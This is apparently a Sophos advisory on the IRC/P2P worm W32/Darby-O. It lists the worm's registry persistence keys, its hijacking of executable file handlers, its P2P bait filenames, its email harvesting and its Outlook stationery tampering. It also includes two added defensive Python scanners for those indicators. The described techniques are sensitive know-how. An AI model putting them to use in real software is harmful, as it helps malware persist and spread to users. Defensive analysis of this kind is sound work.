Sophos

W32/Darby-O


Summary

Affected operating systems Windows
Included in our products from April 2008 (4.28)
Protection available since 11 October 2004 10:26:02 (GMT)
Last updated 20 February 2008 10:52:54 (GMT)
Detected by All Sophos products

More Information

W32/Darby-O is an IRC and peer-to-peer (P2P) worm. When the worm is first
run it displays the following fake error message in English or Spanish:

"Impossible to open the file, <filename> this total or partially damaged."

W32/Darby-O registers itself as a service with the display name
"GEDZAC Service". The worm creates several copies of itself in the Windows
system folder. The filenames can be randomly generated or can be chosen from
the following with the extensions EXE, COM or SCR:

ACCDEFRAGINFO
Image0X
KillUsa
W2KEXPLORERBRD
W2KRUNDLSET

The worm adds an entry to system.ini under the BOOT section:
shell= explorer.exe <path to worm copy>

In order to run on system startup, W32/Darby-O also creates the following
registry entries:

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\
run = <path to worm copy>

HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\Bardiel
StubPath = <path to worm copy>

[HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Run]
ACCDEFRAGINFO = <path to worm copy>

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
ACCDEFRAGINFO = <path to worm copy>

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Shell = Explorer.exe <path to worm copy>

The worm also changes the following registry entries so that a copy of the
worm is run each time a BAT, COM, EXE, PIF, REG or SCR file is run:

HKCR\batfile\shell\open\command
@="%System%\<path to worm copy> \"%1\" %*"

HKCR\comfile\shell\open\command
@="%System%\<path to worm copy> \"%1\" %*"

HKCR\exefile\shell\open\command
@="%System%\<path to worm copy> \"%1\" %*"

HKCR\piffile\shell\open\command
@="%System%\<path to worm copy> \"%1\" %*"

HKCR\regfile\shell\open\command
@="GDC"

HKCR\scrfile\shell\open\command
@="%System%\<path to worm copy> \"%1\" /S"

The worm also creates several entries under the following:

HKLM\SYSTEM\CurrentControlSet\Services\GEDZAC LABS
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\Bardiel
HKLM\SOFTWARE\GedzacLABS\Bardiel.d
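As an added example (not Sophos's code, and not taken from the worm), the following Python audits a registry export (.reg) and a system.ini for the persistence patterns listed above: autostart values under the Run keys and under Windows NT\CurrentVersion\Windows, a Winlogon Shell or [boot] shell= line that launches more than explorer.exe, and shell\open\command handlers that differ from the stock Windows default. The sample export, its paths and the system.ini content are constructed; the expected handler defaults are standard Windows values and do not come from this page.

```python
import re

# Stock Windows defaults for the handlers the worm rewrites (not from the advisory).
DEFAULT_OPEN_COMMANDS = {
    "batfile": '"%1" %*', "comfile": '"%1" %*', "exefile": '"%1" %*',
    "piffile": '"%1" %*', "regfile": 'regedit.exe "%1"', "scrfile": '"%1" /S',
}
RUN_KEYS = (r"software\microsoft\windows\currentversion\run",
            r"software\microsoft\windows nt\currentversion\run")
# Under ...\Windows NT\CurrentVersion\Windows only the "run" and "load" values autostart.
WINDOWS_KEY = r"software\microsoft\windows nt\currentversion\windows"

def _unescape(s):
    # .reg strings escape backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", s)

def parse_reg_export(text):
    """Parse the .reg subset used here: [key] sections with @= or "name"= entries."""
    reg, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            reg.setdefault(key, {})
            continue
        m = re.match(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$', line)
        if not m or key is None:
            continue
        name = "@" if m.group(1) == "@" else _unescape(m.group(2))
        val = m.group(3).strip()
        if len(val) >= 2 and val[0] == '"' and val[-1] == '"':
            reg[key][name] = _unescape(val[1:-1])      # quoted string
        elif val.lower().startswith("dword:"):
            reg[key][name] = int(val[6:], 16)          # dword:XXXXXXXX
        else:
            reg[key][name] = val                       # anything else, kept raw
    return reg

def check_system_ini(text):
    """Flag a [boot] shell= line that starts anything besides explorer.exe."""
    findings, in_boot = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_boot = line[1:-1].lower() == "boot"
        elif in_boot and line.lower().startswith("shell="):
            shell = line.split("=", 1)[1].strip()
            if shell.lower() != "explorer.exe":
                findings.append(("system_ini_shell", "system.ini [boot]", shell))
    return findings

def audit(reg, system_ini=""):
    """Return (category, location, detail) findings; value names are matched exactly."""
    findings = check_system_ini(system_ini)
    for key, values in reg.items():
        hive, _, tail = key.lower().partition("\\")
        if tail in RUN_KEYS:
            findings += [("autostart", key, f"{n} = {v}") for n, v in values.items()]
        elif tail == WINDOWS_KEY:
            findings += [("autostart", key, f"{n} = {values[n]}")
                         for n in ("run", "load") if values.get(n)]
        elif tail.endswith(r"windows nt\currentversion\winlogon"):
            shell = str(values.get("Shell", "explorer.exe")).strip().lower()
            if shell != "explorer.exe":
                findings.append(("winlogon_shell", key, shell))
        m = re.match(r"^(\w+)\\shell\\open\\command$", tail)
        if hive == "hkey_classes_root" and m and m.group(1) in DEFAULT_OPEN_COMMANDS:
            cmd = str(values.get("@", "")).strip()
            if cmd.lower() != DEFAULT_OPEN_COMMANDS[m.group(1)].lower():
                findings.append(("handler_hijack", key, cmd))
    return findings

# Constructed sample export and system.ini using the key names from the
# advisory; the paths are placeholders, not indicators from a real infection.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="C:\\WINDOWS\\system32\\KillUsa.exe \"%1\" %*"

[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@="GDC"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe C:\\WINDOWS\\system32\\KillUsa.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ACCDEFRAGINFO"="C:\\WINDOWS\\system32\\ACCDEFRAGINFO.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"run"="C:\\WINDOWS\\system32\\Image0X.scr"
'''
SAMPLE_SYSTEM_INI = "[boot]\nshell= explorer.exe C:\\WINDOWS\\system32\\KillUsa.exe\n"

if __name__ == "__main__":
    for cat, where, detail in audit(parse_reg_export(SAMPLE_REG), SAMPLE_SYSTEM_INI):
        print(f"{cat:17}{where}\n{'':17}{detail}")
```

On a live system the same checks apply to an export produced with `reg export`, and a handler whose command no longer equals the default is the finding to chase first, since it means every program launch passes through the replacement binary.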

W32/Darby-O creates additional copies of itself in shared P2P folders using
the following names:

ACDSee 5.5.exe
AOL Instant Messenger.exe
AVP Antivirus Pro Key Crack.exe
Age of Empires 2 crack.exe
Ana Kournikova Sex Video.exe
Animated Screen 7.0b.exe
AquaNox2 Crack.exe
Audiograbber 2.05.exe
BabeFest 2004 ScreenSaver 1.5.exe
Babylon 3.50b reg_crack.exe
Battlefield1942_bloodpatch.exe
Battlefield1942_keygen.exe
Britney Spears Sex Video.exe
Buffy Vampire Slayer Movie.exe
Business Card Designer Plus 7.9.exe
Clone CD 5.0.0.3 (crack).exe
Clone CD 5.0.0.3.exe
Coffee Cup Free zip 7.0b.exe
Cool Edit Pro v2.55.exe
Crack Passwords Mail.exe
Credit Card Numbers generator(incl Visa,MasterCard,...).exe
Cristina Aguilera Sex Video.exe
DVD Copy Plus v5.0.exe
DVD Region-Free 2.3.exe
Diablo 2 Crack.exe
DirectDVD 5.0.exe
DirectX Buster (all versions).exe
DirectX InfoTool.exe
DivX Video Bundle 6.5.exe
Download Accelerator Plus 6.1.exe
Edonkey2000-Speed me up scotty.exe
FIFA2004 crack.exe
Final Fantasy VII XP Patch 1.5.exe
Flash MX crack (trial).exe
FlashGet 1.5.exe
FreeRAM XP Pro 1.9.exe
GTA 3 Crack.exe
GTA 3 Serial.exe
Game Cube Real Emulator.exe
GetRight 5.0a.exe
Global DiVX Player 3.0.exe
Gothic2 licence.exe
Guitar Chords Library 5.5.exe
Hentai Anime Girls Movie.exe
Hitman_2_no_cd_crack.exe
Hot Babes XXX Screen Saver.exe
HotGirls.exe
Hotmail Hacker 2004-Xss Exploit.exe
ICQ Pro 2004a.exe
ICQ Pro 2004b (new beta).exe
IrfanView 4.5.exe
Jenifer Lopez Sex Video.exe
KaZaA Hack 2.5.0.exe
KaZaA Speedup 3.6.exe
Kazaa SDK + Xbit speedUp for 2.xx.exe
Links 2004 Golf game (crack).exe
Living Waterfalls 1.3.exe
MSN Messenger 5.2.exe
Mafia_crack.exe
Matrix Movie.exe
Matrix Screensaver 1.5.exe
Mcafee Antivirus Scan Crack.exe
MediaPlayer Update.exe
Microsoft KeyGenerator-Allmost all microsoft stuff.exe
NBA2004_crack.exe
NHL 2004 crack.exe
Need 4 Speed crack.exe
Nero Burning ROM crack.exe
Netbios Nuker 2004.exe
Netfast 1.8.exe
Network Cable e ADSL Speed 2.0.5.exe
Nimo CodecPack (new) 8.0.exe
Norton Anvirus Key Crack.exe
PS2 PlayStation Simulator.exe
PalTalk 5.01b.exe
Panda Antivirus Titanium Crack.exe
PerAntivirus 8.9.exe
Pop-Up Stopper 3.5.exe
Popup Defender 6.5.exe
Quick Time Key Crack.exe
QuickTime_Pro_Crack.exe
Sakura Card Captor Movie.exe
Screen saver christina aguilera naked.exe
Screen saver christina aguilera.exe
Security-2004-Update.exe
Serials 2004 v.8.0 Full.exe
Sex Live Simulator.exe
Sex Passwords.exe
SmartFTP 2.0.0.exe
SmartRipper v2.7.exe
Space Invaders 1978.exe
Spiderman Movie.exe
Splinter_Cell_Crack.exe
Starcraft serial.exe
Start Wars Trilogy Movies.exe
Steinberg_WaveLab_5_crack.exe
Stripping MP3 dancer+crack.exe
Thalia Sex Video.exe
The Hacker Antivirus 5.7.exe
Trillian 0.85 (free).exe
TweakAll 3.8.exe
UT2004_bloodpatch.exe
UT2004_keygen.exe
UT2004_no cd (crack).exe
UT2004_patch.exe
Unreal2_bloodpatch.exe
Unreal2_crack.exe
Virtua Girl (Full).exe
VirtualSex.exe
Visual Basic 6.0 Msdn Plugin.exe
Visual basic 6.exe
WarCraft_3_crack.exe
WinOnCD 4 PE_crack.exe
WinRar 3.xx Password Cracker.exe
WinZip 9.0b.exe
WinZipped Visual C++ Tutorial.exe
Winamp 3.8.exe
WindowBlinds 4.0.exe
Windows XP complete + serial.exe
Windows Xp Exploit.exe
Winzip KeyGenerator Crack.exe
XNuker 2004 2.93b.exe
Yahoo Messenger 6.0.exe
Zelda Classic 2.00.exe
aol cracker.exe
aol password cracker.exe
cable modem ultility pack.exe
counter-strike.exe
delphi.exe
divx pro.exe
divx_pro.exe
hotmail_hack.exe
iMesh 3.6.exe
iMesh 3.7b (beta).exe
index.exe
mIRC 6.40.exe
macromedia dreamweaver key generator.exe
mp3Trim PRO 2.5.exe
pamela_anderson.exe
play station emulator.exe
serials2000.exe
subseven.exe
vb6.exe
virtua girl - adriana.exe
virtua girl - bailey short skirt.exe
warcraft 3 crack.exe
warcraft 3 serials.exe
winamp plugin pack.exe
winzip full version key generator.exe

To ensure that the worm copies are shared, W32/Darby-O edits several settings
under the registry entries for common P2P applications:
KaZaA, Shareaza, Bearshare, Applejuice, Morpheus, eDonkey, FileTopia, Grokster,
iMesh, Limewire, Gnucleus, Overnet and Soulseek.

W32/Darby-O also harvests email addresses from files with extensions
containing the following:
.ht
.txt
.php
.asp

The worm also creates the following files:
%Windows%\microsoftweb.htm
%Windows%\System32girc.zip
%Windows%\Logfiles\w3svc1\<random>.log
%Windows%\bZip.exe
%Windows%\gzip.zip
\Bardiel.hta
%Temp%\bh.dat
%Temp%\bm.dat

The worm then modifies settings for Microsoft Outlook and Outlook Express
by setting the following registry entries:

HKCU\Identities\(593D69E8-BC74-4EFD-93F0-22C74CFDAA77)\Software\
Microsoft\Outlook Express\5.0\Mail
Message Send HTML=dword:00000001
Stationery Name=%Windows%\microsoftweb.htm
Wide Stationery Name=%Windows%\microsoftweb.htm

HKCU\Identities\(593D69E8-BC74-4EFD-93F0-22C74CFDAA77)\Software\
Microsoft\Outlook Express\6.0\Mail
Message Send HTML=dword:00000001
Stationery Name=%Windows%\microsoftweb.htm
Wide Stationery Name=%Windows%\microsoftweb.htm

HKCU\Identities\(593D69E8-BC74-4EFD-93F0-22C74CFDAA77)\Software\
Microsoft\Outlook Express\Mail
Message Send HTML=dword:00000001
Stationery Name=%Windows%\microsoftweb.htm
Wide Stationery Name=%Windows%\microsoftweb.htm

HKCU\Software\Microsoft\Office\10.0\Common\MailSettings
NewStationery=dword:00000000

HKCU\Software\Microsoft\Office\10.0\Outlook\Options\Mail
EditorPreference=dword:00020000

HKCU\Software\Microsoft\Office\11.0\Common\MailSettings
NewStationery=dword:00000000

HKCU\Software\Microsoft\Office\11.0\Outlook\Options\Mail
EditorPreference=dword:00020000

HKCU\Software\Microsoft\Office\8.0\Common\MailSettings
NewStationery=dword:00000000

HKCU\Software\Microsoft\Office\8.0\Outlook\Options\Mail
EditorPreference=dword:00020000

HKCU\Software\Microsoft\Office\9.0\Common\MailSettings
NewStationery=dword:00000000

HKCU\Software\Microsoft\Office\9.0\Outlook\Options\Mail
EditorPreference=dword:00020000

HKCU\Software\Microsoft\Office\Common\MailSettings
NewStationery=dword:00000000

HKCU\Software\Microsoft\Office\Outlook\Options\Mail
EditorPreference=dword:00020000

The microsoftweb.htm file is then used as the default template for all outgoing
email sent from Outlook or Outlook Express and contains a hidden IFRAME object
which connects to a remote site and downloads additional content.
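As an added example (not from Sophos or the worm), this Python scans an HTML stationery file for the pattern described above: IFRAME objects that load from a remote host while being sized or styled so the recipient never sees them. The sample stationery and its hostnames are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the document."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # attrs is a list of (name, value); bare attributes have value None
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

def _dimension(value):
    """'0', '0px', '1%' -> 0, 0, 1; anything without digits -> None."""
    digits = "".join(ch for ch in value if ch.isdigit())
    return int(digits) if digits else None

def is_hidden(attrs):
    """True if the frame has no visible area or is styled out of view."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    if "hidden" in attrs:
        return True
    w, h = _dimension(attrs.get("width", "")), _dimension(attrs.get("height", ""))
    return (w is not None and w <= 1) or (h is not None and h <= 1)

def scan_stationery(html):
    """Return every iframe that loads from a remote host, with a hidden flag."""
    parser = _IframeCollector()
    parser.feed(html)
    hits = []
    for frame in parser.iframes:
        src = frame.get("src", "")
        host = urlparse(src).netloc
        if host:                      # relative or empty src is not a remote load
            hits.append({"src": src, "host": host, "hidden": is_hidden(frame)})
    return hits

# Constructed sample stationery: one visible banner frame and one zero-sized,
# display:none frame pulling from a placeholder host.
SAMPLE_STATIONERY = """<html><body style="background:#fff">
<p>Signature text</p>
<iframe src="http://stationery-host.example/banner.html" width="200" height="60"></iframe>
<iframe src="http://download-placeholder.example/content.hta" width="0" height="0" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in scan_stationery(SAMPLE_STATIONERY):
        print(("HIDDEN  " if hit["hidden"] else "visible ") + hit["src"])
```

Point it at whatever path the Stationery Name registry value names; a stationery file that embeds any hidden remote frame should be treated as suspect regardless of which host it references.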

W32/Darby-O also disables access to registry editing tools.
